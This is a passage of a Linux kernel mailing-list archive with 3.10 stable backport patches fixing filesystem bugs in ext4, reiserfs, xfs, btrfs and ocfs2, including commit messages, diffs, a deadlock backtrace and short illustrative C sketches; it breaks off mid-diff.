@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 154/319] ext4: allow DAX writeback for hole punch Willy Tarreau
                   ` (165 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daeho Jeong, Hobin Woo, Theodore Ts'o, Willy Tarreau

From: Daeho Jeong <daeho.jeong@samsung.com>

commit 93e3b4e6631d2a74a8cf7429138096862ff9f452 upstream.

Currently, ext4_do_update_inode() clears the high 16-bit uid/gid fields
of a deleted and evicted inode to fix up interoperability with old
kernels. However, it checks only the inode's i_dtime to determine
whether the inode was deleted and evicted. This is risky because
i_dtime can also be used as the pointer that maintains the orphan inode
list. Even when i_dtime is non-zero, we need to further check whether
it is being used for the orphan inode list.

We found that the high 16-bit uid/gid fields of an inode are
unintentionally and permanently cleared by the following sequence: an
inode truncation is triggered but not yet finished, the inode metadata
with the high uid/gid bits cleared is written to disk, and a sudden
power-off follows.
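
As a rough illustration (not part of the patch), the corrected decision
can be modelled in plain C. The struct and function names below are
hypothetical; the real code works on struct ext4_inode_info, tests
list_empty(&ei->i_orphan), and stores the result with cpu_to_le16().

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified stand-in for the in-memory inode state. */
struct model_inode {
	uint32_t i_dtime;        /* non-zero: deletion time or orphan-list link */
	bool     on_orphan_list; /* models !list_empty(&ei->i_orphan) */
	uint32_t uid;            /* full 32-bit uid */
};

/* Value that would be written to the on-disk i_uid_high field. */
static uint16_t uid_high_to_write(const struct model_inode *ino)
{
	assert(ino != NULL);

	/* Clear only when the inode is deleted AND not on the orphan list. */
	if (ino->i_dtime && !ino->on_orphan_list)
		return 0;

	/* Otherwise keep the upper 16 bits of the uid intact. */
	return (uint16_t)(ino->uid >> 16);
}
```

With the old check (i_dtime alone), an inode that is still on the
orphan list would take the first branch and lose its high uid bits.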

Signed-off-by: Daeho Jeong <daeho.jeong@samsung.com>
Signed-off-by: Hobin Woo <hobin.woo@samsung.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/inode.c | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index 046e0e1..a187055 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -4480,14 +4480,14 @@ static int ext4_do_update_inode(handle_t *handle,
  * Fix up interoperability with old kernels. Otherwise, old inodes get
  * re-used with the upper 16 bits of the uid/gid intact
  */
-		if (!ei->i_dtime) {
+		if (ei->i_dtime && list_empty(&ei->i_orphan)) {
+			raw_inode->i_uid_high = 0;
+			raw_inode->i_gid_high = 0;
+		} else {
 			raw_inode->i_uid_high =
 				cpu_to_le16(high_16_bits(i_uid));
 			raw_inode->i_gid_high =
 				cpu_to_le16(high_16_bits(i_gid));
-		} else {
-			raw_inode->i_uid_high = 0;
-			raw_inode->i_gid_high = 0;
 		}
 	} else {
 		raw_inode->i_uid_low = cpu_to_le16(fs_high2lowuid(i_uid));
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 154/319] ext4: allow DAX writeback for hole punch
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (52 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 153/319] ext4: reinforce check of i_dtime when clearing high fields of uid and gid Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 155/319] ext4: sanity check the block and cluster size at mount time Willy Tarreau
                   ` (164 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ross Zwisler, Theodore Ts'o, Willy Tarreau

From: Ross Zwisler <ross.zwisler@linux.intel.com>

commit cca32b7eeb4ea24fa6596650e06279ad9130af98 upstream.

Currently when doing a DAX hole punch with ext4 we fail to do a writeback.
This is because the logic around filemap_write_and_wait_range() in
ext4_punch_hole() only looks for dirty page cache pages in the radix tree,
not for dirty DAX exceptional entries.

Signed-off-by: Ross Zwisler <ross.zwisler@linux.intel.com>
Reviewed-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/inode.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index a187055..31179ba 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -3610,7 +3610,7 @@ int ext4_can_truncate(struct inode *inode)
 }
 
 /*
- * ext4_punch_hole: punches a hole in a file by releaseing the blocks
+ * ext4_punch_hole: punches a hole in a file by releasing the blocks
  * associated with the given offset and length
  *
  * @inode:  File inode
@@ -3646,7 +3646,7 @@ int ext4_punch_hole(struct file *file, loff_t offset, loff_t length)
 	 * Write out all dirty pages to avoid race conditions
 	 * Then release them.
 	 */
-	if (mapping->nrpages && mapping_tagged(mapping, PAGECACHE_TAG_DIRTY)) {
+	if (mapping_tagged(mapping, PAGECACHE_TAG_DIRTY)) {
 		ret = filemap_write_and_wait_range(mapping, offset,
 						   offset + length - 1);
 		if (ret)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 155/319] ext4: sanity check the block and cluster size at mount time
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (53 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 154/319] ext4: allow DAX writeback for hole punch Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 156/319] reiserfs: fix "new_insert_key may be used uninitialized ..." Willy Tarreau
                   ` (163 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Theodore Ts'o, Willy Tarreau

From: Theodore Ts'o <tytso@mit.edu>

commit 8cdf3372fe8368f56315e66bea9f35053c418093 upstream.

If the block size or cluster size is insane, reject the mount.  This
is important for security reasons (although we shouldn't be just
depending on this check).
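
A minimal sketch of the two range checks, assuming the limits shown in
the diff below (10, 16 and 30). The function and macro names here are
hypothetical, and the sketch ignores that the kernel applies the cluster
check only on the bigalloc path.

```c
#include <stdbool.h>
#include <stdint.h>

/* Limits mirrored from the patch; the names are shortened stand-ins. */
#define MIN_BLOCK_LOG_SIZE   10
#define MAX_BLOCK_LOG_SIZE   16
#define MAX_CLUSTER_LOG_SIZE 30

/*
 * The superblock stores both sizes as log2(size) - 10, so the largest
 * acceptable stored value is (max log size - min block log size).
 */
static bool log_sizes_valid(uint32_t log_block_size, uint32_t log_cluster_size)
{
	if (log_block_size > MAX_BLOCK_LOG_SIZE - MIN_BLOCK_LOG_SIZE)
		return false;	/* block size would exceed 64 KiB */
	if (log_cluster_size > MAX_CLUSTER_LOG_SIZE - MIN_BLOCK_LOG_SIZE)
		return false;	/* cluster size would exceed 1 GiB */
	return true;
}
```

Rejecting the stored logarithm directly keeps later shifts by these
values within a sane range, which is the point of the mount-time check.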

Ref: http://www.securityfocus.com/archive/1/539661
Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1332506
Reported-by: Borislav Petkov <bp@alien8.de>
Reported-by: Nikolay Borisov <kernel@kyup.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/ext4.h  |  1 +
 fs/ext4/super.c | 17 ++++++++++++++++-
 2 files changed, 17 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 046e3e9..f9c938e 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -246,6 +246,7 @@ struct ext4_io_submit {
 #define	EXT4_MAX_BLOCK_SIZE		65536
 #define EXT4_MIN_BLOCK_LOG_SIZE		10
 #define EXT4_MAX_BLOCK_LOG_SIZE		16
+#define EXT4_MAX_CLUSTER_LOG_SIZE	30
 #ifdef __KERNEL__
 # define EXT4_BLOCK_SIZE(s)		((s)->s_blocksize)
 #else
diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6cf69fa..faa1920 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -3537,7 +3537,15 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
 	if (blocksize < EXT4_MIN_BLOCK_SIZE ||
 	    blocksize > EXT4_MAX_BLOCK_SIZE) {
 		ext4_msg(sb, KERN_ERR,
-		       "Unsupported filesystem blocksize %d", blocksize);
+		       "Unsupported filesystem blocksize %d (%d log_block_size)",
+			 blocksize, le32_to_cpu(es->s_log_block_size));
+		goto failed_mount;
+	}
+	if (le32_to_cpu(es->s_log_block_size) >
+	    (EXT4_MAX_BLOCK_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) {
+		ext4_msg(sb, KERN_ERR,
+			 "Invalid log block size: %u",
+			 le32_to_cpu(es->s_log_block_size));
 		goto failed_mount;
 	}
 
@@ -3652,6 +3660,13 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
 				 "block size (%d)", clustersize, blocksize);
 			goto failed_mount;
 		}
+		if (le32_to_cpu(es->s_log_cluster_size) >
+		    (EXT4_MAX_CLUSTER_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) {
+			ext4_msg(sb, KERN_ERR,
+				 "Invalid log cluster size: %u",
+				 le32_to_cpu(es->s_log_cluster_size));
+			goto failed_mount;
+		}
 		sbi->s_cluster_bits = le32_to_cpu(es->s_log_cluster_size) -
 			le32_to_cpu(es->s_log_block_size);
 		sbi->s_clusters_per_group =
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 156/319] reiserfs: fix "new_insert_key may be used uninitialized ..."
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (54 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 155/319] ext4: sanity check the block and cluster size at mount time Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 157/319] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount() Willy Tarreau
                   ` (162 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jeff Mahoney, Arnd Bergmann, Jan Kara, Linus Torvalds,
	Andrew Morton, Willy Tarreau

From: Jeff Mahoney <jeffm@suse.com>

commit 0a11b9aae49adf1f952427ef1a1d9e793dd6ffb6 upstream.

new_insert_key only makes any sense when it's associated with a
new_insert_ptr, which is initialized to NULL and changed to a
buffer_head when we also initialize new_insert_key.  We can key off of
that to avoid the uninitialized warning.
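
The idea can be sketched outside the kernel as follows. This is only an
illustration under simplified assumptions: struct key and
publish_insert() are hypothetical names, not reiserfs symbols.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical fixed-size key, standing in for the reiserfs key. */
struct key {
	unsigned char bytes[16];
};

/*
 * Hand the (pointer, key) pair back to the caller. The key is only
 * meaningful when new_ptr is non-NULL, so it is copied only in that
 * case and an uninitialized new_key is never read.
 */
static void publish_insert(struct key *dst_key, void **dst_ptr,
			   const struct key *new_key, void *new_ptr)
{
	assert(dst_key != NULL && dst_ptr != NULL && new_key != NULL);

	*dst_ptr = new_ptr;
	if (new_ptr)
		memcpy(dst_key, new_key, sizeof(*dst_key));
}
```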

Link: http://lkml.kernel.org/r/5eca5ffb-2155-8df2-b4a2-f162f105efed@suse.com
Signed-off-by: Jeff Mahoney <jeffm@suse.com>
Cc: Arnd Bergmann <arnd@arndb.de>
Cc: Jan Kara <jack@suse.cz>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/reiserfs/ibalance.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/reiserfs/ibalance.c b/fs/reiserfs/ibalance.c
index e1978fd..58cce0c 100644
--- a/fs/reiserfs/ibalance.c
+++ b/fs/reiserfs/ibalance.c
@@ -1082,8 +1082,9 @@ int balance_internal(struct tree_balance *tb,	/* tree_balance structure
 				       insert_ptr);
 	}
 
-	memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE);
 	insert_ptr[0] = new_insert_ptr;
+	if (new_insert_ptr)
+		memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE);
 
 	return order;
 }
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 157/319] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (55 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 156/319] reiserfs: fix "new_insert_key may be used uninitialized ..." Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 158/319] xfs: fix superblock inprogress check Willy Tarreau
                   ` (161 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Mike Galbraith, Jan Kara, Willy Tarreau

From: Mike Galbraith <efault@gmx.de>

commit 420902c9d086848a7548c83e0a49021514bd71b7 upstream.

If we hold the superblock lock while calling reiserfs_quota_on_mount(), we can
deadlock our own worker - mount blocks kworker/3:2, sleeps forever more.

crash> ps|grep UN
    715      2   3  ffff880220734d30  UN   0.0       0      0  [kworker/3:2]
   9369   9341   2  ffff88021ffb7560  UN   1.3  493404 123184  Xorg
   9665   9664   3  ffff880225b92ab0  UN   0.0   47368    812  udisks-daemon
  10635  10403   3  ffff880222f22c70  UN   0.0   14904    936  mount
crash> bt ffff880220734d30
PID: 715    TASK: ffff880220734d30  CPU: 3   COMMAND: "kworker/3:2"
 #0 [ffff8802244c3c20] schedule at ffffffff8144584b
 #1 [ffff8802244c3cc8] __rt_mutex_slowlock at ffffffff814472b3
 #2 [ffff8802244c3d28] rt_mutex_slowlock at ffffffff814473f5
 #3 [ffff8802244c3dc8] reiserfs_write_lock at ffffffffa05f28fd [reiserfs]
 #4 [ffff8802244c3de8] flush_async_commits at ffffffffa05ec91d [reiserfs]
 #5 [ffff8802244c3e08] process_one_work at ffffffff81073726
 #6 [ffff8802244c3e68] worker_thread at ffffffff81073eba
 #7 [ffff8802244c3ec8] kthread at ffffffff810782e0
 #8 [ffff8802244c3f48] kernel_thread_helper at ffffffff81450064
crash> rd ffff8802244c3cc8 10
ffff8802244c3cc8:  ffffffff814472b3 ffff880222f23250   .rD.....P2."....
ffff8802244c3cd8:  0000000000000000 0000000000000286   ................
ffff8802244c3ce8:  ffff8802244c3d30 ffff880220734d80   0=L$.....Ms ....
ffff8802244c3cf8:  ffff880222e8f628 0000000000000000   (.."............
ffff8802244c3d08:  0000000000000000 0000000000000002   ................
crash> struct rt_mutex ffff880222e8f628
struct rt_mutex {
  wait_lock = {
    raw_lock = {
      slock = 65537
    }
  },
  wait_list = {
    node_list = {
      next = 0xffff8802244c3d48,
      prev = 0xffff8802244c3d48
    }
  },
  owner = 0xffff880222f22c71,
  save_state = 0
}
crash> bt 0xffff880222f22c70
PID: 10635  TASK: ffff880222f22c70  CPU: 3   COMMAND: "mount"
 #0 [ffff8802216a9868] schedule at ffffffff8144584b
 #1 [ffff8802216a9910] schedule_timeout at ffffffff81446865
 #2 [ffff8802216a99a0] wait_for_common at ffffffff81445f74
 #3 [ffff8802216a9a30] flush_work at ffffffff810712d3
 #4 [ffff8802216a9ab0] schedule_on_each_cpu at ffffffff81074463
 #5 [ffff8802216a9ae0] invalidate_bdev at ffffffff81178aba
 #6 [ffff8802216a9af0] vfs_load_quota_inode at ffffffff811a3632
 #7 [ffff8802216a9b50] dquot_quota_on_mount at ffffffff811a375c
 #8 [ffff8802216a9b80] finish_unfinished at ffffffffa05dd8b0 [reiserfs]
 #9 [ffff8802216a9cc0] reiserfs_fill_super at ffffffffa05de825 [reiserfs]
    RIP: 00007f7b9303997a  RSP: 00007ffff443c7a8  RFLAGS: 00010202
    RAX: 00000000000000a5  RBX: ffffffff8144ef12  RCX: 00007f7b932e9ee0
    RDX: 00007f7b93d9a400  RSI: 00007f7b93d9a3e0  RDI: 00007f7b93d9a3c0
    RBP: 00007f7b93d9a2c0   R8: 00007f7b93d9a550   R9: 0000000000000001
    R10: ffffffffc0ed040e  R11: 0000000000000202  R12: 000000000000040e
    R13: 0000000000000000  R14: 00000000c0ed040e  R15: 00007ffff443ca20
    ORIG_RAX: 00000000000000a5  CS: 0033  SS: 002b

Signed-off-by: Mike Galbraith <efault@gmx.de>
Acked-by: Frederic Weisbecker <fweisbec@gmail.com>
Acked-by: Mike Galbraith <mgalbraith@suse.de>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/reiserfs/super.c | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/fs/reiserfs/super.c b/fs/reiserfs/super.c
index e2e202a..7ff27fa 100644
--- a/fs/reiserfs/super.c
+++ b/fs/reiserfs/super.c
@@ -184,7 +184,15 @@ static int remove_save_link_only(struct super_block *s,
 static int reiserfs_quota_on_mount(struct super_block *, int);
 #endif
 
-/* look for uncompleted unlinks and truncates and complete them */
+/*
+ * Look for uncompleted unlinks and truncates and complete them
+ *
+ * Called with superblock write locked.  If quotas are enabled, we have to
+ * release/retake lest we call dquot_quota_on_mount(), proceed to
+ * schedule_on_each_cpu() in invalidate_bdev() and deadlock waiting for the per
+ * cpu worklets to complete flush_async_commits() that in turn wait for the
+ * superblock write lock.
+ */
 static int finish_unfinished(struct super_block *s)
 {
 	INITIALIZE_PATH(path);
@@ -231,7 +239,9 @@ static int finish_unfinished(struct super_block *s)
 				quota_enabled[i] = 0;
 				continue;
 			}
+			reiserfs_write_unlock(s);
 			ret = reiserfs_quota_on_mount(s, i);
+			reiserfs_write_lock(s);
 			if (ret < 0)
 				reiserfs_warning(s, "reiserfs-2500",
 						 "cannot turn on journaled "
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 158/319] xfs: fix superblock inprogress check
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (56 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 157/319] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 159/319] libxfs: clean up _calc_dquots_per_chunk Willy Tarreau
                   ` (160 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dave Chinner, Dave Chinner, Willy Tarreau

From: Dave Chinner <dchinner@redhat.com>

commit f3d7ebdeb2c297bd26272384e955033493ca291c upstream.

From inspection, the superblock sb_inprogress check is done in the
verifier and triggered only for the primary superblock via a
"bp->b_bn == XFS_SB_DADDR" check.

Unfortunately, the primary superblock is an uncached buffer, and
hence it is configured by xfs_buf_read_uncached() with:

	bp->b_bn = XFS_BUF_DADDR_NULL;  /* always null for uncached buffers */

And so this check never triggers. Fix it.

Signed-off-by: Dave Chinner <dchinner@redhat.com>
Reviewed-by: Brian Foster <bfoster@redhat.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Dave Chinner <david@fromorbit.com>
[wt: s/xfs_sb.c/xfs_mount.c in 3.10]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/xfs/xfs_mount.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/xfs/xfs_mount.c b/fs/xfs/xfs_mount.c
index e8e310c..363c4cc 100644
--- a/fs/xfs/xfs_mount.c
+++ b/fs/xfs/xfs_mount.c
@@ -689,7 +689,8 @@ xfs_sb_verify(
 	 * Only check the in progress field for the primary superblock as
 	 * mkfs.xfs doesn't clear it from secondary superblocks.
 	 */
-	return xfs_mount_validate_sb(mp, &sb, bp->b_bn == XFS_SB_DADDR,
+	return xfs_mount_validate_sb(mp, &sb,
+				     bp->b_maps[0].bm_bn == XFS_SB_DADDR,
 				     check_version);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 159/319] libxfs: clean up _calc_dquots_per_chunk
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (57 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 158/319] xfs: fix superblock inprogress check Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 160/319] btrfs: ensure that file descriptor used with subvol ioctls is a dir Willy Tarreau
                   ` (159 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Darrick J. Wong, Dave Chinner, Willy Tarreau

From: "Darrick J. Wong" <darrick.wong@oracle.com>

commit 58d789678546d46d7bbd809dd7dab417c0f23655 upstream.

The function xfs_calc_dquots_per_chunk takes a parameter in units
of basic blocks.  The kernel seems to get the units wrong, but
userspace got 'fixed' by commenting out the unnecessary conversion.
Fix both.

Signed-off-by: Darrick J. Wong <darrick.wong@oracle.com>
Reviewed-by: Eric Sandeen <sandeen@redhat.com>
Signed-off-by: Dave Chinner <david@fromorbit.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/xfs/xfs_dquot.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/fs/xfs/xfs_dquot.c b/fs/xfs/xfs_dquot.c
index bac3e16..e59f309 100644
--- a/fs/xfs/xfs_dquot.c
+++ b/fs/xfs/xfs_dquot.c
@@ -309,8 +309,7 @@ xfs_dquot_buf_verify_crc(
 	if (mp->m_quotainfo)
 		ndquots = mp->m_quotainfo->qi_dqperchunk;
 	else
-		ndquots = xfs_qm_calc_dquots_per_chunk(mp,
-					XFS_BB_TO_FSB(mp, bp->b_length));
+		ndquots = xfs_qm_calc_dquots_per_chunk(mp, bp->b_length);
 
 	for (i = 0; i < ndquots; i++, d++) {
 		if (!xfs_verify_cksum((char *)d, sizeof(struct xfs_dqblk),
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 160/319] btrfs: ensure that file descriptor used with subvol ioctls is a dir
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (58 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 159/319] libxfs: clean up _calc_dquots_per_chunk Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 161/319] ocfs2/dlm: fix race between convert and migration Willy Tarreau
                   ` (158 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jeff Mahoney, Chris Mason, Willy Tarreau

From: Jeff Mahoney <jeffm@suse.com>

commit 325c50e3cebb9208009083e841550f98a863bfa0 upstream.

If the subvol/snapshot create/destroy ioctls are passed a regular file
with execute permissions set, we'll eventually Oops while trying to do
inode->i_op->lookup via lookup_one_len.

This patch ensures that the file descriptor refers to a directory.

Fixes: cb8e70901d (Btrfs: Fix subvolume creation locking rules)
Fixes: 76dda93c6a (Btrfs: add snapshot/subvolume destroy ioctl)
Signed-off-by: Jeff Mahoney <jeffm@suse.com>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/btrfs/ioctl.c | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
index dbefa6c..296cc1b 100644
--- a/fs/btrfs/ioctl.c
+++ b/fs/btrfs/ioctl.c
@@ -1496,6 +1496,9 @@ static noinline int btrfs_ioctl_snap_create_transid(struct file *file,
 	int namelen;
 	int ret = 0;
 
+	if (!S_ISDIR(file_inode(file)->i_mode))
+		return -ENOTDIR;
+
 	ret = mnt_want_write_file(file);
 	if (ret)
 		goto out;
@@ -1553,6 +1556,9 @@ static noinline int btrfs_ioctl_snap_create(struct file *file,
 	struct btrfs_ioctl_vol_args *vol_args;
 	int ret;
 
+	if (!S_ISDIR(file_inode(file)->i_mode))
+		return -ENOTDIR;
+
 	vol_args = memdup_user(arg, sizeof(*vol_args));
 	if (IS_ERR(vol_args))
 		return PTR_ERR(vol_args);
@@ -1576,6 +1582,9 @@ static noinline int btrfs_ioctl_snap_create_v2(struct file *file,
 	bool readonly = false;
 	struct btrfs_qgroup_inherit *inherit = NULL;
 
+	if (!S_ISDIR(file_inode(file)->i_mode))
+		return -ENOTDIR;
+
 	vol_args = memdup_user(arg, sizeof(*vol_args));
 	if (IS_ERR(vol_args))
 		return PTR_ERR(vol_args);
@@ -2081,6 +2090,9 @@ static noinline int btrfs_ioctl_snap_destroy(struct file *file,
 	int ret;
 	int err = 0;
 
+	if (!S_ISDIR(dir->i_mode))
+		return -ENOTDIR;
+
 	vol_args = memdup_user(arg, sizeof(*vol_args));
 	if (IS_ERR(vol_args))
 		return PTR_ERR(vol_args);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 161/319] ocfs2/dlm: fix race between convert and migration
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (59 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 160/319] btrfs: ensure that file descriptor used with subvol ioctls is a dir Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 162/319] ocfs2: fix start offset to ocfs2_zero_range_for_truncate() Willy Tarreau
                   ` (157 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Joseph Qi, Jun Piao, Mark Fasheh, Joel Becker, Junxiao Bi,
	Andrew Morton, Linus Torvalds, Willy Tarreau

From: Joseph Qi <joseph.qi@huawei.com>

commit e6f0c6e6170fec175fe676495f29029aecdf486c upstream.

Commit ac7cf246dfdb ("ocfs2/dlm: fix race between convert and recovery")
checks whether the lockres master has changed to identify whether the
new master has finished recovery.  This introduces a race when a new
convert request arrives right after the old master does umount (which
means the master will change).

In this case, it will reset lockres state to DLM_RECOVERING and then
retry convert, and then fail with lockres->l_action being set to
OCFS2_AST_INVALID, which will cause inconsistent lock level between
ocfs2 and dlm, and then finally BUG.

Since dlm recovery will clear lock->convert_pending in
dlm_move_lockres_to_recovery_list, we can use it to correctly identify
the race case between convert and recovery.  So fix it.

Fixes: ac7cf246dfdb ("ocfs2/dlm: fix race between convert and recovery")
Link: http://lkml.kernel.org/r/57CE1569.8010704@huawei.com
Signed-off-by: Joseph Qi <joseph.qi@huawei.com>
Signed-off-by: Jun Piao <piaojun@huawei.com>
Cc: Mark Fasheh <mfasheh@versity.com>
Cc: Joel Becker <jlbec@evilplan.org>
Cc: Junxiao Bi <junxiao.bi@oracle.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ocfs2/dlm/dlmconvert.c | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/fs/ocfs2/dlm/dlmconvert.c b/fs/ocfs2/dlm/dlmconvert.c
index f65bdcf..6d97883 100644
--- a/fs/ocfs2/dlm/dlmconvert.c
+++ b/fs/ocfs2/dlm/dlmconvert.c
@@ -265,7 +265,6 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm,
 				  struct dlm_lock *lock, int flags, int type)
 {
 	enum dlm_status status;
-	u8 old_owner = res->owner;
 
 	mlog(0, "type=%d, convert_type=%d, busy=%d\n", lock->ml.type,
 	     lock->ml.convert_type, res->state & DLM_LOCK_RES_IN_PROGRESS);
@@ -332,7 +331,6 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm,
 
 	spin_lock(&res->spinlock);
 	res->state &= ~DLM_LOCK_RES_IN_PROGRESS;
-	lock->convert_pending = 0;
 	/* if it failed, move it back to granted queue.
 	 * if master returns DLM_NORMAL and then down before sending ast,
 	 * it may have already been moved to granted queue, reset to
@@ -341,12 +339,14 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm,
 		if (status != DLM_NOTQUEUED)
 			dlm_error(status);
 		dlm_revert_pending_convert(res, lock);
-	} else if ((res->state & DLM_LOCK_RES_RECOVERING) ||
-			(old_owner != res->owner)) {
-		mlog(0, "res %.*s is in recovering or has been recovered.\n",
-				res->lockname.len, res->lockname.name);
